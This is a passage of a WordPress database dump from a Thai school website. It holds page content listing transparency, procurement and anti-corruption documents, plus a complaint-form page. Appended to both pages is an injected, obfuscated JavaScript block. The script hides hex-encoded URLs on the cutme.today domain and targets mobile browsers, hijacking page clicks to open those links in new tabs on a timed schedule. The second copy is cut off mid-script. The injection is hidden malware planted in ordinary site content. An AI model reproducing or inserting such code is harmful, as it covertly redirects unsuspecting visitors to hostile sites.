/wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1502\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-01 09:32:06','2025-07-01 02:32:06','',871,'http://pakhaeng.ssk.in.th/?p=1505',0,'revision','',0),
(1506,1,'2025-07-01 10:13:07','2025-07-01 03:13:07','','%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89','','publish','closed','closed','','%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3','','','2025-07-01 10:15:46','2025-07-01 03:15:46','',0,'http://pakhaeng.ssk.in.th/?post_type=forminator_forms&#038;p=1506',0,'forminator_forms','',0),
(1507,1,'2025-07-01 10:16:33','2025-07-01 03:16:33','<!-- wp:shortcode -->\n[forminator_form id=\"1506\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 